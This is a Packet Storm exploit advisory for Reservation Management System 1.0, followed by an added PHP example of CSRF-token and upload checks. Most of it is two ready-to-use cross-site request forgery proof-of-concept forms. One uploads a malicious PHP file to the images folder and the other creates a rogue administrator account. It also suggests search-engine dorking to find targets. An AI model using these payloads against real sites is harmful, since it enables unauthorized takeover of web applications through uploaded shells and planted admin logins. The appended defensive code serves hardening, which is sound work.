Reservation Management System 1.0 Cross Site Request Forgery

Reservation Management System version 1.0 suffers from a cross site request forgery vulnerability.

Packet Storm

=============================================================================================================================================
| # Title : Reservation Management System 1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip |
=============================================================================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] The following HTML code uploads a malicious executable file remotely.

[+] Line 8 : Set your target url

[+] save payload as poc.html

[+] payload :

<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h4 class="modal-title">Add New Menu</h4>
</div>
<div class="modal-body">
<!--start form-->
<form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data">
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Menu Name</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Category</label>
<div class="col-lg-8">
<select class="form-control select2" id="exampleSelect1" name="cat" required="">
<option value="9">Dessert</option>
<option value="6">Main Course</option>
<option value="7">Pasta</option>
<option value="10">Rice</option>
</select>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Subcategory</label>
<div class="col-lg-8">
<select class="form-control select2" id="exampleSelect1" name="subcat">
<option>Drinks</option>
<option>Lunch and Dinner</option>
<option>Mirienda</option>
<option>Non Combo Meal</option>
</select>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Description</label>
<div class="col-lg-8">
<textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Price</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="price" id="title" placeholder="Price" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Image</label>
<div class="col-lg-8">
<input type="file" class="form-control" name="image" id="title">
</div>
</div>

              <!-- Buttons -->  
              <div class="form-group">  
                  <!-- Buttons -->  
                  <div class="col-lg-offset-2 col-lg-6">  
                    <button type="submit" class="btn btn-sm btn-primary">Save</button>  
                    <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
                   </div>  
              </div>  
          </form>  
          <!--end form-->  
        </div>

                </div>

[+] Ev!L : http://127.0.0.1/reservation/images/shopping.php

-----------[+] Part 02 Add Admin [+]-------------------

[+] Line 8 : Set your target url

[+] save payload as poc.html

[+] payload :

<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h4 class="modal-title">Add New User</h4>
</div>
<div class="modal-body">
<!--start form-->
<form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php">
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Full Name</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="username">Username</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="password">Password</label>
<div class="col-lg-8">
<input type="password" class="form-control" name="password" id="password" placeholder="Write password" required="">
</div>
</div>

                                                                  <!-- Buttons -->  
              <div class="form-group">  
                  <!-- Buttons -->  
                  <div class="col-lg-offset-2 col-lg-6">  
                    <button type="submit" class="btn btn-sm btn-primary">Save</button>  
                    <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
                   </div>  
              </div>  
          </form>  
          <!--end form-->  
        </div>

                </div>  

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
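
Both forms above work because admin/menu_save.php and admin/user_save.php act on a cross-site POST that carries only the administrator's session cookie, and the first one leaves the uploaded file under an executable name in images/. The PHP below is an added example, not part of the advisory or the application's code: the helper names (start_admin_session, csrf_field, require_csrf, save_menu_image) and the csrf_token field are assumptions chosen for illustration.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical guards for state-changing admin handlers.
// Helper names and the 'csrf_token' field are assumptions, not the application's code.

function start_admin_session(): void {
    // SameSite=Strict keeps the session cookie off cross-site form posts (PHP 7.3+).
    session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
    session_start();
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
}

// Emit inside every admin <form> so legitimate posts carry the token.
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars($_SESSION['csrf_token'], ENT_QUOTES) . '">';
}

// Call first in each handler, before any database or file write.
function require_csrf(): void {
    $known = $_SESSION['csrf_token'] ?? '';
    $sent  = $_POST['csrf_token'] ?? '';
    // Reject a missing session token too, so two empty strings never match.
    if ($known === '' || !is_string($sent) || !hash_equals($known, $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

// Store an uploaded image under a server-chosen name; returns the new file name.
function save_menu_image(array $file, string $dir): string {
    $types = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed');
    }
    // Detect the type from the content; ignore the client-supplied name and type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($types[$mime])) {
        throw new RuntimeException('Only JPEG, PNG or GIF images are accepted');
    }
    // The extension comes from the allow-list, so a .php name can never be stored.
    $name = bin2hex(random_bytes(16)) . '.' . $types[$mime];
    if (!move_uploaded_file($file['tmp_name'], $dir . '/' . $name)) {
        throw new RuntimeException('Could not store upload');
    }
    return $name;
}
```

A handler would call start_admin_session() and require_csrf() before touching $_POST, and pass $_FILES['image'] to save_menu_image(). Turning off script execution for the images directory in the web server configuration adds a second layer.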
